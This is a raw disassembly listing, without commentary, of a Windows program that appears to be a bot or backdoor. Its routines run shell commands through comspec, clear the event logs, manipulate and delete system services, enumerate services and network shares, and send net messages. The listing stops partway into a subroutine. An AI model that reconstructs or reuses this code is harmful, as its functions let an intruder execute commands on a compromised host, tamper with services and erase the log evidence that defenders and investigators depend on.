cmp eax, 0FFFFFFFFh
jz short loc_4189D2
lea eax, [ebp+var_15C]
push 80h
push eax
call ds:dword_42709C ; SetFileAttributesA
loc_4189D2: ; CODE XREF: sub_4188A6+118�j
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset aComspecCSS ; "%%comspec%% /c %s %s"
push eax
call sub_41C266
add esp, 10h
lea eax, [ebp+var_364]
push edi
push eax
lea eax, [ebp+var_764]
push eax
call ds:dword_427184 ; ExpandEnvironmentStringsA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push 4008h
push 1
push esi
lea eax, [ebp+var_364]
push esi
push eax
push esi
call ds:dword_427074 ; CreateProcessA
loc_418A2A: ; CODE XREF: sub_4188A6+72�j
pop edi
pop esi
leave
retn
sub_4188A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418A2E proc near ; CODE XREF: sub_401ACD+7133�p
var_294 = byte ptr -294h
var_94 = dword ptr -94h
var_84 = dword ptr -84h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 294h
push edi
xor edi, edi
push 94h
lea eax, [ebp+var_94]
push edi
push eax
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+var_94]
mov [ebp+var_94], 94h
push eax
call ds:dword_4270D0 ; GetVersionExA
cmp [ebp+var_84], 2
jnz short loc_418AC4
push [ebp+arg_10]
push [ebp+arg_C]
call dword_4CB954 ; OpenEventLogA
push edi
push eax
call dword_4CB964 ; ClearEventLogA
test eax, eax
jz short loc_418AB6
push [ebp+arg_10]
push offset dword_4394FC
loc_418A8F: ; CODE XREF: sub_418A2E+94�j
lea eax, [ebp+var_294]
push eax
call sub_41C266
push edi
lea eax, [ebp+var_294]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 20h
jmp short loc_418AEE
; ---------------------------------------------------------------------------
loc_418AB6: ; CODE XREF: sub_418A2E+57�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_4394D4
jmp short loc_418A8F
; ---------------------------------------------------------------------------
loc_418AC4: ; CODE XREF: sub_418A2E+3F�j
lea eax, [ebp+var_294]
push offset unk_4394A4
push eax
call sub_41C266
push edi
lea eax, [ebp+var_294]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 1Ch
loc_418AEE: ; CODE XREF: sub_418A2E+86�j
pop edi
leave
retn
sub_418A2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418AF1 proc near ; CODE XREF: sub_401ACD+551C�p
var_1C0 = byte ptr -1C0h
var_15C = byte ptr -15Ch
var_F8 = byte ptr -0F8h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_84 = dword ptr -84h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1C0h
lea eax, [ebp+var_94]
mov [ebp+var_94], 94h
push eax
call ds:dword_4270D0 ; GetVersionExA
cmp [ebp+var_90], 4
jnz short loc_418B47
cmp [ebp+var_8C], 0
jnz short loc_418B30
push 1
pop eax
cmp [ebp+var_84], eax
jnz short loc_418B47
leave
retn
; ---------------------------------------------------------------------------
loc_418B30: ; CODE XREF: sub_418AF1+30�j
cmp [ebp+var_8C], 0Ah
jz short loc_418B42
cmp [ebp+var_8C], 5Ah
jnz short loc_418B47
loc_418B42: ; CODE XREF: sub_418AF1+46�j
push 1
pop eax
leave
retn
; ---------------------------------------------------------------------------
loc_418B47: ; CODE XREF: sub_418AF1+27�j
; sub_418AF1+3B�j ...
push esi
push edi
push offset aNetapi32_dll ; "netapi32.dll"
call ds:dword_4270C0 ; LoadLibraryA
mov esi, eax
push offset aNetmessagebuff ; "NetMessageBufferSend"
push esi
call ds:dword_4270C4 ; GetProcAddress
push 32h
mov edi, eax
push [ebp+arg_0]
lea eax, [ebp+var_1C0]
push eax
call sub_41E0D4
push 32h
lea eax, [ebp+var_15C]
push [ebp+arg_4]
push eax
call sub_41E0D4
push 32h
lea eax, [ebp+var_F8]
push [ebp+arg_8]
push eax
call sub_41E0D4
lea eax, [ebp+var_F8]
push eax
call sub_41E0B7
shl eax, 1
push eax
lea eax, [ebp+var_F8]
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_1C0]
push eax
push 0
call edi ; GetProcessHeap
add esp, 3Ch
mov edi, eax
push esi
call ds:dword_427144 ; FreeLibrary
mov eax, edi
pop edi
pop esi
leave
retn
sub_418AF1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418BD1 proc near ; CODE XREF: sub_40111D+F7�p
; sub_40F0F1+A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
pop ecx
call sub_41C2C2
mov esi, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
fild [ebp+var_4]
sub eax, esi
mov [ebp+arg_4], eax
fimul [ebp+arg_4]
fmul ds:dbl_4276E0
call sub_41D174
sub esi, eax
mov eax, esi
pop esi
leave
retn
sub_418BD1 endp
; =============== S U B R O U T I N E =======================================
sub_418C0E proc near ; CODE XREF: sub_401ACD:loc_406021�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
test edi, edi
jz short loc_418C66
lea esi, [eax+eax*2]
push 0
shl esi, 2
push 0
push dword_439520[esi]
push edi
push eax
call sub_418C88
add esp, 14h
test eax, eax
jnz short loc_418C56
push edi
push off_43951C[esi]
push offset unk_439630
loc_418C46: ; CODE XREF: sub_418C0E+56�j
mov esi, offset dword_4DBA40
push esi
call sub_41C266
add esp, 10h
jmp short loc_418C83
; ---------------------------------------------------------------------------
loc_418C56: ; CODE XREF: sub_418C0E+2A�j
push eax
call sub_418D2A
pop ecx
push eax
push edi
push offset unk_439604
jmp short loc_418C46
; ---------------------------------------------------------------------------
loc_418C66: ; CODE XREF: sub_418C0E+C�j
lea eax, [eax+eax*2]
mov esi, offset dword_4DBA40
push off_439518[eax*4]
push offset unk_4395E0
push esi
call sub_41C266
add esp, 0Ch
loc_418C83: ; CODE XREF: sub_418C0E+46�j
mov eax, esi
pop edi
pop esi
retn
sub_418C0E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418C88 proc near ; CODE XREF: sub_418C0E+20�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
call dword_4CB9C8 ; OpenSCManagerA
mov edi, eax
cmp edi, ebx
jnz short loc_418CAF
call ds:dword_427094 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_418D24
; ---------------------------------------------------------------------------
loc_418CAF: ; CODE XREF: sub_418C88+1B�j
push esi
push 0F01FFh
push [ebp+arg_4]
push edi
call dword_4CB8B0 ; OpenServiceA
mov esi, eax
cmp esi, ebx
jnz short loc_418CCF
call ds:dword_427094 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_418D1C
; ---------------------------------------------------------------------------
loc_418CCF: ; CODE XREF: sub_418C88+3B�j
mov eax, [ebp+arg_0]
cmp eax, 1
jz short loc_418D02
cmp eax, 3
jz short loc_418CF3
jle short loc_418D15
cmp eax, 6
jg short loc_418D15
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_8]
push esi
call dword_4CB91C ; ControlService
jmp short loc_418D09
; ---------------------------------------------------------------------------
loc_418CF3: ; CODE XREF: sub_418C88+52�j
push [ebp+arg_10]
push [ebp+arg_C]
push esi
call dword_4CB8B8 ; StartServiceA
jmp short loc_418D09
; ---------------------------------------------------------------------------
loc_418D02: ; CODE XREF: sub_418C88+4D�j
push esi
call dword_4CB920 ; DeleteService
loc_418D09: ; CODE XREF: sub_418C88+69�j
; sub_418C88+78�j
test eax, eax
jnz short loc_418D15
call ds:dword_427094 ; RtlGetLastWin32Error
mov ebx, eax
loc_418D15: ; CODE XREF: sub_418C88+54�j
; sub_418C88+59�j ...
push esi
call dword_4CB8CC ; CloseServiceHandle
loc_418D1C: ; CODE XREF: sub_418C88+45�j
push edi
call dword_4CB8CC ; CloseServiceHandle
pop esi
loc_418D24: ; CODE XREF: sub_418C88+25�j
mov eax, ebx
pop edi
pop ebx
leave
retn
sub_418C88 endp
; =============== S U B R O U T I N E =======================================
sub_418D2A proc near ; CODE XREF: sub_418C0E+49�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 420h
cmp eax, ecx
ja loc_418DDF
jz loc_418DD8
add ecx, 0FFFFFFFBh
cmp eax, ecx
ja short loc_418DA2
jz short loc_418D98
mov ecx, eax
sub ecx, 3
jz short loc_418D8E
dec ecx
dec ecx
jz short loc_418D84
dec ecx
jz short loc_418D7A
sub ecx, 51h
jz short loc_418D70
sub ecx, 24h
jnz loc_418E55 ; default
; jumptable 00418DFC cases 1,5,6,8,9,12,13,15,16
push offset aTheSpecifiedSe ; "The specified service name is invalid."
jmp loc_418E47
; ---------------------------------------------------------------------------
loc_418D70: ; CODE XREF: sub_418D2A+31�j
push offset aTheRequestedCo ; "The requested control code is undefined"...
jmp loc_418E47
; ---------------------------------------------------------------------------
loc_418D7A: ; CODE XREF: sub_418D2A+2C�j
push offset aTheHandleIsInv ; "The handle is invalid."
jmp loc_418E47
; ---------------------------------------------------------------------------
loc_418D84: ; CODE XREF: sub_418D2A+29�j
push offset aTheHandleDoesN ; "The handle does not have the required a"...
jmp loc_418E47
; ---------------------------------------------------------------------------
loc_418D8E: ; CODE XREF: sub_418D2A+25�j
push offset aTheServiceBina ; "The service binary file could not be fo"...
jmp loc_418E47
; ---------------------------------------------------------------------------
loc_418D98: ; CODE XREF: sub_418D2A+1E�j
push offset aTheServiceCann ; "The service cannot be stopped because o"...
jmp loc_418E47
; ---------------------------------------------------------------------------
loc_418DA2: ; CODE XREF: sub_418D2A+1C�j
mov ecx, eax
sub ecx, 41Ch
jz short loc_418DD1
dec ecx
jz short loc_418DCA
dec ecx
jz short loc_418DC3
dec ecx
jnz loc_418E55 ; default
; jumptable 00418DFC cases 1,5,6,8,9,12,13,15,16
push offset aTheDatabaseIsL ; "The database is locked."
jmp loc_418E47
; ---------------------------------------------------------------------------
loc_418DC3: ; CODE XREF: sub_418D2A+86�j
push offset aAThreadCouldNo ; "A thread could not be created for the s"...
jmp short loc_418E47
; ---------------------------------------------------------------------------
loc_418DCA: ; CODE XREF: sub_418D2A+83�j
push offset aTheProcessForT ; "The process for the service was started"...
jmp short loc_418E47
; ---------------------------------------------------------------------------
loc_418DD1: ; CODE XREF: sub_418D2A+80�j
push offset aTheRequested_0 ; "The requested control code is not valid"...
jmp short loc_418E47
; ---------------------------------------------------------------------------
loc_418DD8: ; CODE XREF: sub_418D2A+11�j
push offset aAnInstanceOfTh ; "An instance of the service is already r"...
jmp short loc_418E47
; ---------------------------------------------------------------------------
loc_418DDF: ; CODE XREF: sub_418D2A+B�j
mov ecx, 45Bh
cmp eax, ecx
ja short loc_418E55 ; default
; jumptable 00418DFC cases 1,5,6,8,9,12,13,15,16
jz short loc_418E42
lea ecx, [eax-422h]
cmp ecx, 11h ; switch 18 cases
ja short loc_418E55 ; default
; jumptable 00418DFC cases 1,5,6,8,9,12,13,15,16
movzx ecx, ds:byte_418E96[ecx]
jmp ds:off_418E6E[ecx*4] ; switch jump
loc_418E03: ; DATA XREF: .text:off_418E6E�o
push offset aTheSpecifiedDa ; jumptable 00418DFC case 7
jmp short loc_418E47
; ---------------------------------------------------------------------------
loc_418E0A: ; CODE XREF: sub_418D2A+D2�j
; DATA XREF: .text:off_418E6E�o
push offset aTheServiceDepe ; jumptable 00418DFC case 17
jmp short loc_418E47
; ---------------------------------------------------------------------------
loc_418E11: ; CODE XREF: sub_418D2A+D2�j
; DATA XREF: .text:off_418E6E�o
push offset aTheServiceDe_0 ; jumptable 00418DFC case 10
jmp short loc_418E47
; ---------------------------------------------------------------------------
loc_418E18: ; CODE XREF: sub_418D2A+D2�j
; DATA XREF: .text:off_418E6E�o
push offset aTheServiceHasB ; jumptable 00418DFC case 0
jmp short loc_418E47
; ---------------------------------------------------------------------------
loc_418E1F: ; CODE XREF: sub_418D2A+D2�j
; DATA XREF: .text:off_418E6E�o
push offset aTheSpecified_0 ; jumptable 00418DFC case 2
jmp short loc_418E47
; ---------------------------------------------------------------------------
loc_418E26: ; CODE XREF: sub_418D2A+D2�j
; DATA XREF: .text:off_418E6E�o
push offset aTheServiceCoul ; jumptable 00418DFC case 11
jmp short loc_418E47
; ---------------------------------------------------------------------------
loc_418E2D: ; CODE XREF: sub_418D2A+D2�j
; DATA XREF: .text:off_418E6E�o
push offset aTheServiceHa_0 ; jumptable 00418DFC case 14
jmp short loc_418E47
; ---------------------------------------------------------------------------
loc_418E34: ; CODE XREF: sub_418D2A+D2�j
; DATA XREF: .text:off_418E6E�o
push offset aTheRequested_1 ; jumptable 00418DFC case 3
jmp short loc_418E47
; ---------------------------------------------------------------------------
loc_418E3B: ; CODE XREF: sub_418D2A+D2�j
; DATA XREF: .text:off_418E6E�o
push offset aTheServiceHasN ; jumptable 00418DFC case 4
jmp short loc_418E47
; ---------------------------------------------------------------------------
loc_418E42: ; CODE XREF: sub_418D2A+BE�j
push offset aTheSystemIsShu ; "The system is shutting down."
loc_418E47: ; CODE XREF: sub_418D2A+41�j
; sub_418D2A+4B�j ...
push offset dword_4DB380
call sub_41C266
pop ecx
pop ecx
jmp short loc_418E68
; ---------------------------------------------------------------------------
loc_418E55: ; CODE XREF: sub_418D2A+36�j
; sub_418D2A+89�j ...
push eax ; default
; jumptable 00418DFC cases 1,5,6,8,9,12,13,15,16
push offset aAnUnknownError ; "An unknown error occurred: <%ld>"
push offset dword_4DB380
call sub_41C266
add esp, 0Ch
loc_418E68: ; CODE XREF: sub_418D2A+129�j
mov eax, offset dword_4DB380
retn
sub_418D2A endp
; ---------------------------------------------------------------------------
off_418E6E dd offset loc_418E18 ; DATA XREF: sub_418D2A+D2�r
dd offset loc_418E1F ; jump table for switch statement
dd offset loc_418E34
dd offset loc_418E3B
dd offset loc_418E03
dd offset loc_418E11
dd offset loc_418E26
dd offset loc_418E2D
dd offset loc_418E0A
dd offset loc_418E55
byte_418E96 db 0, 9, 1, 2 ; DATA XREF: sub_418D2A+CB�r
db 3, 9, 9, 4 ; indirect table for switch statement
db 9, 9, 5, 6
db 9, 9, 7, 9
db 9, 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418EA8 proc near ; CODE XREF: sub_401ACD+44D6�p
var_38C = byte ptr -38Ch
var_18C = byte ptr -18Ch
var_188 = byte ptr -188h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38Ch
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_8], ebx
call dword_4CB9C8 ; OpenSCManagerA
push ebx
mov [ebp+var_C], eax
push [ebp+arg_8]
push offset aTheFollowingWi ; "The following Windows services are regi"...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 14h
loc_418EE0: ; CODE XREF: sub_418EA8+120�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18C]
push 168h
push eax
push 3
push 30h
push [ebp+var_C]
call dword_4CB994 ; EnumServicesStatusA
test eax, eax
jnz short loc_418F1A
call ds:dword_427094 ; RtlGetLastWin32Error
cmp eax, 0EAh
jnz loc_418FCE
loc_418F1A: ; CODE XREF: sub_418EA8+5F�j
xor edi, edi
cmp [ebp+var_4], ebx
jle loc_418FC5
lea esi, [ebp+var_188]
loc_418F2B: ; CODE XREF: sub_418EA8+117�j
mov eax, [esi+8]
dec eax
jz short loc_418F74
dec eax
jz short loc_418F6D
dec eax
jz short loc_418F66
dec eax
jz short loc_418F5F
dec eax
jz short loc_418F58
dec eax
jz short loc_418F51
dec eax
jz short loc_418F4A
push offset aUnknown_0 ; " Unknown"
jmp short loc_418F79
; ---------------------------------------------------------------------------
loc_418F4A: ; CODE XREF: sub_418EA8+99�j
push offset aPaused ; " Paused"
jmp short loc_418F79
; ---------------------------------------------------------------------------
loc_418F51: ; CODE XREF: sub_418EA8+96�j
push offset aPausing ; " Pausing"
jmp short loc_418F79
; ---------------------------------------------------------------------------
loc_418F58: ; CODE XREF: sub_418EA8+93�j
push offset aContinuing ; " Continuing"
jmp short loc_418F79
; ---------------------------------------------------------------------------
loc_418F5F: ; CODE XREF: sub_418EA8+90�j
push offset aRunning ; " Running"
jmp short loc_418F79
; ---------------------------------------------------------------------------
loc_418F66: ; CODE XREF: sub_418EA8+8D�j
push offset aStoping ; " Stoping"
jmp short loc_418F79
; ---------------------------------------------------------------------------
loc_418F6D: ; CODE XREF: sub_418EA8+8A�j
push offset aStarting ; " Starting"
jmp short loc_418F79
; ---------------------------------------------------------------------------
loc_418F74: ; CODE XREF: sub_418EA8+87�j
push offset aStopped ; " Stopped"
loc_418F79: ; CODE XREF: sub_418EA8+A0�j
; sub_418EA8+A7�j ...
lea eax, [ebp+var_20]
push eax
call sub_41C266
pop ecx
lea eax, [ebp+var_20]
pop ecx
push dword ptr [esi]
push dword ptr [esi-4]
push eax
lea eax, [ebp+var_38C]
push offset aSSS_2 ; "%s: %s (%s)"
push eax
call sub_41C266
push 1
lea eax, [ebp+var_38C]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 28h
inc edi
add esi, 24h
cmp edi, [ebp+var_4]
jl loc_418F2B
loc_418FC5: ; CODE XREF: sub_418EA8+77�j
cmp [ebp+var_8], ebx
jnz loc_418EE0
loc_418FCE: ; CODE XREF: sub_418EA8+6C�j
push [ebp+var_C]
call dword_4CB8CC ; CloseServiceHandle
xor eax, eax
pop edi
cmp eax, [ebp+var_4]
pop esi
pop ebx
sbb eax, eax
neg eax
leave
retn
sub_418EA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418FE5 proc near ; CODE XREF: sub_401ACD:loc_406064�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
test edi, edi
jz loc_41907F
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, 0
jz short loc_41900E
dec eax
jnz short loc_41905F
push edi
push 0
call sub_4191B8
pop ecx
pop ecx
jmp short loc_41905B
; ---------------------------------------------------------------------------
loc_41900E: ; CODE XREF: sub_418FE5+18�j
cmp [ebp+arg_8], 0
jnz short loc_41904D
push 24h
push edi
call sub_41C990
pop ecx
test eax, eax
pop ecx
jnz short loc_41904D
push 57h
pop eax
loc_419025: ; CODE XREF: sub_418FE5+78�j
push eax
call sub_4199AC
pop ecx
push eax
lea eax, [esi+esi*2]
push edi
mov esi, offset dword_4DB63C
push off_439518[eax*4]
push offset unk_439BC4
push esi
call sub_41C266
add esp, 14h
jmp short loc_41909F
; ---------------------------------------------------------------------------
loc_41904D: ; CODE XREF: sub_418FE5+2D�j
; sub_418FE5+3B�j
push [ebp+arg_8]
push edi
push 0
call sub_41910C
add esp, 0Ch
loc_41905B: ; CODE XREF: sub_418FE5+27�j
test eax, eax
jnz short loc_419025
loc_41905F: ; CODE XREF: sub_418FE5+1B�j
lea eax, [esi+esi*2]
push edi
mov esi, offset dword_4DB63C
push off_43951C[eax*4]
push offset dword_439BA8
push esi
call sub_41C266
add esp, 10h
jmp short loc_41909F
; ---------------------------------------------------------------------------
loc_41907F: ; CODE XREF: sub_418FE5+A�j
mov eax, [ebp+arg_0]
mov esi, offset dword_4DB63C
lea eax, [eax+eax*2]
push off_439518[eax*4]
push offset unk_439B84
push esi
call sub_41C266
add esp, 0Ch
loc_41909F: ; CODE XREF: sub_418FE5+66�j
; sub_418FE5+98�j
mov eax, esi
pop edi
pop esi
pop ebp
retn
sub_418FE5 endp
; =============== S U B R O U T I N E =======================================
sub_4190A5 proc near ; CODE XREF: sub_41A3C6+245�p
arg_0 = dword ptr 4
arg_C = dword ptr 10h
push esi
xor esi, esi
cmp [esp+4+arg_0], esi
jnz short loc_4190B2
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4190B2: ; CODE XREF: sub_4190A5+7�j
push ebx
push ebp
push edi
push esi
push esi
push esi
mov edi, ds:dword_427188
push esi
push 0FFFFFFFFh
mov ebx, 400h
push [esp+24h+arg_0]
push ebx
push esi
call edi ; WideCharToMultiByte
test byte_4DB83C, 1
mov ebp, eax
jnz short loc_4190EF
or byte_4DB83C, 1
lea eax, [ebp+1]
push eax
call sub_41D9A5
pop ecx
mov dword_4DB5DC, eax
loc_4190EF: ; CODE XREF: sub_4190A5+32�j
push esi
push esi
push ebp
push dword_4DB5DC
push 0FFFFFFFFh
push [esp+18h+arg_C]
push ebx
push esi
call edi ; WideCharToMultiByte
mov eax, dword_4DB5DC
pop edi
pop ebp
pop ebx
pop esi
retn
sub_4190A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41910C proc near ; CODE XREF: sub_418FE5+6E�p
; sub_41A6EA+18A�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push edi
push [ebp+arg_0]
call sub_419177
push [ebp+arg_4]
mov edi, eax
call sub_419177
push 24h
mov [ebp+var_20], eax
push [ebp+arg_4]
call sub_41C990
push [ebp+arg_8]
mov [ebp+var_14], 7Fh
neg eax
sbb eax, eax
and [ebp+var_18], 0
or [ebp+var_10], 0FFFFFFFFh
and [ebp+var_C], 0
and eax, 80000000h
mov [ebp+var_1C], eax
call sub_419177
add esp, 14h
mov [ebp+var_8], eax
and [ebp+var_4], 0
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_20]
push eax
push 2
push edi
call dword_4CB8C8
pop edi
leave
retn
sub_41910C endp
; =============== S U B R O U T I N E =======================================
sub_419177 proc near ; CODE XREF: sub_41910C+A�p
; sub_41910C+14�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
xor eax, eax
cmp ebp, eax
jnz short loc_419184
pop ebp
retn
; ---------------------------------------------------------------------------
loc_419184: ; CODE XREF: sub_419177+9�j
push ebx
push esi
mov esi, ds:dword_4270E8
push edi
push eax
push eax
push 0FFFFFFFFh
push ebp
push 1
push eax
call esi ; MultiByteToWideChar
mov edi, eax
lea eax, [edi+edi+2]
push eax
call sub_41D9A5
pop ecx
mov ebx, eax
push edi
push ebx
push 0FFFFFFFFh
push ebp
push 1
push 0
call esi ; MultiByteToWideChar
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn
sub_419177 endp
; =============== S U B R O U T I N E =======================================
sub_4191B8 proc near ; CODE XREF: sub_418FE5+20�p
; sub_41A3C6+1BB�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_419177
push [esp+8+arg_4]
mov esi, eax
call sub_419177
pop ecx
pop ecx
push 0
push eax
push esi
call dword_4CB8A0
pop esi
retn
sub_4191B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4191DB proc near ; CODE XREF: sub_401ACD+45AE�p
var_210 = byte ptr -210h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
push edi
push [ebp+arg_C]
call sub_419177
xor esi, esi
mov [ebp+var_C], eax
push esi
mov [ebp+arg_C], esi
push [ebp+arg_8]
mov [ebp+var_8], esi
mov [ebp+var_10], esi
push offset aShareNameResou ; "Share name: Resource: "...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 18h
loc_419214: ; CODE XREF: sub_4191DB+10F�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 1F6h
push [ebp+var_C]
call dword_4CB918
mov ebx, eax
cmp ebx, esi
jz short loc_419277
cmp ebx, 0EAh
jz short loc_419277
push ebx
push ebx
call sub_4199AC
pop ecx
push eax
lea eax, [ebp+var_210]
push offset unk_439C10
push eax
call sub_41C266
push esi
lea eax, [ebp+var_210]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 24h
jmp short loc_4192E4
; ---------------------------------------------------------------------------
loc_419277: ; CODE XREF: sub_4191DB+5D�j
; sub_4191DB+65�j
push 1
pop edi
cmp [ebp+arg_C], edi
jb short loc_4192DB
mov eax, [ebp+var_4]
lea esi, [eax+14h]
loc_419285: ; CODE XREF: sub_4191DB+FC�j
push dword ptr [esi+10h]
call dword_4CB8BC ; IsValidSecurityDescriptor
test eax, eax
mov eax, offset aYes ; "Yes"
jnz short loc_41929C
mov eax, offset aNo ; "No"
loc_41929C: ; CODE XREF: sub_4191DB+BA�j
push eax
lea eax, [ebp+var_210]
push dword ptr [esi]
push dword ptr [esi+4]
push dword ptr [esi-14h]
push offset a14s24s6u4s ; "%-14S %-24S %-6u %-4s"
push eax
call sub_41C266
push 1
lea eax, [ebp+var_210]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 2Ch
add esi, 28h
inc edi
cmp edi, [ebp+arg_C]
jbe short loc_419285
xor esi, esi
loc_4192DB: ; CODE XREF: sub_4191DB+A2�j
push [ebp+var_4]
call dword_4CBA64
loc_4192E4: ; CODE XREF: sub_4191DB+9A�j
cmp ebx, 0EAh
jz loc_419214
xor eax, eax
cmp ebx, esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_4191DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4192FC proc near ; CODE XREF: sub_401ACD:loc_4060ED�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
cmp ebx, edi
jz loc_4193A1
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, edi
jz short loc_41933E
dec eax
jz short loc_419333
dec eax
jnz short loc_419359
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push ebx
push edi
call sub_419443
add esp, 14h
jmp short loc_419355
; ---------------------------------------------------------------------------
loc_419333: ; CODE XREF: sub_4192FC+1D�j
push ebx
push edi
call sub_419422
pop ecx
pop ecx
jmp short loc_419355
; ---------------------------------------------------------------------------
loc_41933E: ; CODE XREF: sub_4192FC+1A�j
cmp [ebp+arg_8], edi
jz short loc_419352
push [ebp+arg_8]
push ebx
push edi
call sub_4193C8
add esp, 0Ch
jmp short loc_419355
; ---------------------------------------------------------------------------
loc_419352: ; CODE XREF: sub_4192FC+45�j
push 57h
pop eax
loc_419355: ; CODE XREF: sub_4192FC+35�j
; sub_4192FC+40�j ...
cmp eax, edi
jnz short loc_419379
loc_419359: ; CODE XREF: sub_4192FC+20�j
lea eax, [esi+esi*2]
push ebx
mov esi, offset dword_4DB840
push off_43951C[eax*4]
push offset unk_439CC8
push esi
call sub_41C266
add esp, 10h
jmp short loc_4193C1
; ---------------------------------------------------------------------------
loc_419379: ; CODE XREF: sub_4192FC+5B�j
push eax
call sub_4199AC
pop ecx
push eax
lea eax, [esi+esi*2]
push ebx
mov esi, offset dword_4DB840
push off_439518[eax*4]
push offset unk_439C98
push esi
call sub_41C266
add esp, 14h
jmp short loc_4193C1
; ---------------------------------------------------------------------------
loc_4193A1: ; CODE XREF: sub_4192FC+D�j
mov eax, [ebp+arg_0]
mov esi, offset dword_4DB840
lea eax, [eax+eax*2]
push off_439518[eax*4]
push offset unk_439C70
push esi
call sub_41C266
add esp, 0Ch
loc_4193C1: ; CODE XREF: sub_4192FC+7B�j
; sub_4192FC+A3�j
mov eax, esi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4192FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4193C8 proc near ; CODE XREF: sub_4192FC+4C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
